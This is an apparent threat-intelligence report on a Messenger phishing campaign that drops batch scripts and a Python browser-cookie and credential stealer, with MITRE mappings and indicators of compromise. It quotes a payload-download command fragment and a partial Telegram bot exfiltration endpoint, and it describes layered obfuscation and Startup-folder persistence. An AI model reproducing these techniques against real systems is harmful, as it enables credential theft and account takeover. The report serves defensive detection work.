Keypoints
- Attackers send mass Facebook Messenger messages to business accounts with compressed attachments that contain a Windows batch dropper.
- The initial batch (Stage I) downloads and extracts a second batch (Stage II) from GitHub/GitLab which then creates a local Python environment and fetches the main stealer (project.py).
- Stage II uses an encoding trick (mixed file encoding/UTF-16LE) to hide content and evade static inspection while still executing as a batch script.
- The Python stealer uses a 5-layer compression/encoding chain and then extracts cookies and saved login data from multiple browsers (Chrome, Edge, Firefox, Brave, Opera, Cốc Cốc, Chromium, etc.).
- Stolen data is compressed and posted to attacker-controlled Telegram/Discord channels via bot API tokens; the stealer also deletes cookies to lock out victims.
- Persistence is achieved by writing a startup batch (WindowsSecure.bat) so the stealer runs on every boot; payloads are hosted on free code hosts (GitHub/GitLab) to avoid reputation-based blocks.
MITRE Techniques
- [T1566.001] Spearphishing Attachment – Attackers send Messenger messages with compressed archives containing a malicious batch script to lure business owners into executing them (‘luring business owners to click on the malicious attachment’).
- [T1204.002] User Execution: Malicious File – The received RAR/ZIP contains a Windows batch Stage I dropper that the user must open/execute to initiate the chain (‘This batch script acts as the Stage I Dropper, prepping your system for the real payload.’).
- [T1105] Ingress Tool Transfer – The dropper downloads additional payload components (Document.zip, project.py, WindowsSecure.bat) directly from GitHub/GitLab using Invoke-WebRequest/curl (‘Invoke-WebRequest -URI https://gitlab.com/… -OutFile C:UsersPublicDocument.zip’).
- [T1027] Obfuscated Files or Information – The main Python stealer and batch scripts use multiple encodings and compression layers (including a UTF-16LE trick and a 5-layer compress/decode chain) to hide malicious content (‘5 layers of obfuscation’).
- [T1539] Steal Web Session Cookie – The Python payload enumerates browsers and extracts session cookies to hijack authenticated sessions (‘A simple straightforward Python script that extracts all cookies and login data …’).
- [T1555.002] Credentials from Web Browsers – The stealer retrieves saved usernames and passwords from various browser databases and decrypts them for exfiltration (‘extracts all cookies and login data (saved usernames and passwords) from several popular browsers’).
- [T1547.001] Boot or Logon Autostart Execution: Startup Folder – The dropper installs a WindowsSecure.bat into the user Startup folder to ensure the stealer runs at each login (‘Adds persistence in the form of the WindowsSecure.bat file that executes the stealer on every startup.’).
- [T1041] Exfiltration Over C2 Channel – Collected data is compressed and uploaded via Telegram/Discord bot APIs to attacker-controlled channels (‘sent to a telegram channel using Telegram’s/Discord bot API’).
Indicators of Compromise
- [Code hosting Git repos] payload hosting and download URLs – gitlab[.]com/xjnhzaj12b2, github[.]com/xjnhzaj12b1, and other repositories (gitlab[.]com/alibaba2023, github[.]com/hahahoho9).
- [Domain] malicious landing/resource domain – shoppingvideo247.com (used in campaign infrastructure).
- [Sample filenames] attachment names used in phishing messages – video-86-6p3wlfNcq3eV4ZVleoZZ-22100-18228.rar, ordered-products-VJi85uO5oOH4oD1fV6Px-22100-45036.rar, and ~40+ additional similarly structured filenames.
- [File hashes] sample malware binaries/archives – a39f0c56dd602fcc14adcdeaa31c21d389af8ea8abcb89862fac19e2807c799d, c8af31d897d7e2ee9babb6a60dec5b65fc4b018e4ce8da6a5d8008ce5926bd54, and dozens more (many hashes listed in the report).
- [Exfiltration endpoints / bot identifiers] Telegram/Discord exfil targets – example API endpoint pattern ‘https://api[.]telegram[.]org/bot6186662136:AAGyzxWQ0OzgV…/sendDocument’ with chat ID ‘-921942879’ (token and chat tied to attacker channels).
The attack chain begins with a social-engineered Messenger message containing a compressed archive. When opened, the archive supplies a Stage I Windows batch script that downloads a second archive from free code-hosting (GitHub/GitLab), extracts a Stage II batch (vn.cmd) and executes it. The Stage II script leverages a deliberate encoding trick (file encoding confusion/UTF-16LE mixed bytes) to conceal its content from static scanners while still executing; it then uses PowerShell/curl to fetch a Documents.zip and a Python payload (project.py), unpacks a standalone Python environment, and schedules a persistent WindowsSecure.bat in the Startup folder to run on each login.
The core stealer (project.py) is heavily obfuscated: its payload is wrapped in multiple encoding/compression layers (binascii.unhexlify → zlib → bz2 → gzip → lzma → marshal) and executed at runtime. Once deobfuscated, the script enumerates multiple browser data paths (Chrome, Edge, Firefox, Brave, Opera, Cốc Cốc, Chromium), extracts session cookies and stored credentials, decrypts browser-stored secrets, compresses the stolen profiles into an archive, and transmits the archive to attacker-controlled Telegram/Discord bots via their API endpoints. As part of the workflow the script also deletes cookies after extraction to prevent victims from regaining sessions, facilitating account takeover.
Infrastructure choices (hosting payloads on public GitHub/GitLab repositories, using Telegram/Discord bot APIs for exfiltration) and multi-layer obfuscation keep detection low and enable rapid monetization: attackers maintain persistence via Startup folder scripts, and use the stolen session data to sell hijacked business accounts on underground markets. Defenders should flag the described filenames, hosting repos, and bot endpoints and monitor for the batch download-and-execute pattern and runtime decompression/exec behaviors described above.